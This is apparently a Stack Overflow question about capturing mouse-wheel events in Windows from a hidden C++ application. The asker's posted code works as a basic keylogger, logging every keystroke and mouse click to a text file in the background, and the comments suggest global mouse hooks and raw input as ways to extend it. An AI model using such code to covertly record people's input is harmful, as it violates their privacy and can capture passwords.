# How can I detect mouse scroll event on windows from background app

Tags: c++, windows, winapi, mouseevent, mousewheel

How can I detect mouse scroll and movement event on windows from c++ application even when the application itself is inactive (I mean minimized or hidden) I can get keyboard events

```
for (int i = 8; i <= 190; i++)
            {
                if (GetAsyncKeyState(i) == -32767){
                    SaveLogs(i, "log.txt");
                    wcout << (wchar_t)i;
                }
            }
```

///...

```
int SaveLogs(int key_stroke, char *file){
if ((key_stroke == 1) || (key_stroke == 2))
    return 0; FILE *OUTPUT_FILE;

OUTPUT_FILE = fopen(file, "a+"); /*cout << key_stroke << endl;*/
if (key_stroke == 8)  // The numbers stands for the ascii value of a character
    fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == VK_MENU) ////
    fprintf(OUTPUT_FILE, "%s", "[ALT]");
else if (key_stroke == VK_PAUSE) ////
    fprintf(OUTPUT_FILE, "%s", "[PAUSE]");
else if (key_stroke == VK_CAPITAL) ////
    fprintf(OUTPUT_FILE, "%s", "[CAPSLOCK]");
else if (key_stroke == VK_PRIOR) ////
    fprintf(OUTPUT_FILE, "%s", "[PAGEUP]");
else if (key_stroke == VK_NEXT) ////
    fprintf(OUTPUT_FILE, "%s", "[PAGEDOWN]");
```

and so on...

and I can also detect mouse cklicks

```
switch (CheckMouseButtons()){
            case 1:wcout << L"[l]";
                output << L"[LMB]";
                break;
            case 2:wcout << L"[r]";
                output << L"[RMB]";
                break;
            case 3:wcout << L"[m]";
                output << L"[MMB]";
                break;
            default: break;
            }
```

and

```
int CheckMouseButtons(){
if ((GetKeyState(VK_LBUTTON) & 0x80) != 0)
{
    if (((GetTickCount() - lastclicktime) / 100) > 1)
    {

        lastclicktime = GetTickCount();
        lastclick = 1;
        return 1;
    }
}
if ((GetKeyState(VK_RBUTTON) & 0x80) != 0)
{
    if (((GetTickCount() - lastclicktime) / 100) > 1)
    {

        lastclicktime = GetTickCount();
        lastclick = 2;
        return 2;
    }
}
if ((GetKeyState(VK_MBUTTON) & 0x80) != 0)
{
    if (((GetTickCount() - lastclicktime) / 100) > 1)
    {

        lastclicktime = GetTickCount();
        lastclick = 3;
        return 3;
    }
}
return 0;
```

}

but I cant get mouse scroll key event. I need only to detect if it was scrolled (Up or Down is less important)

Comment: I have tried this example [link]http://msdn.microsoft.com/en-us/library/windows/desktop/ms685035(v=vs.85).aspx[link] but it only works when console window is active.

Comment: Have you tried using [`SetWindowsHookEx`](http://msdn.microsoft.com/en-us/library/windows/desktop/ms644990%28v=vs.85%29.aspx) with a [MouseProc](http://msdn.microsoft.com/en-us/library/windows/desktop/ms644988%28v=vs.85%29.aspx) or [LowLevelMouseProc](http://msdn.microsoft.com/en-us/library/windows/desktop/ms644986%28v=vs.85%29.aspx) callback?

Comment: See my answer here, using the `RegisterRawInputDevices` API http://stackoverflow.com/questions/21899872/ruby-implementation-win32api-get-mouse-scroll-wheel-input/21961482#21961482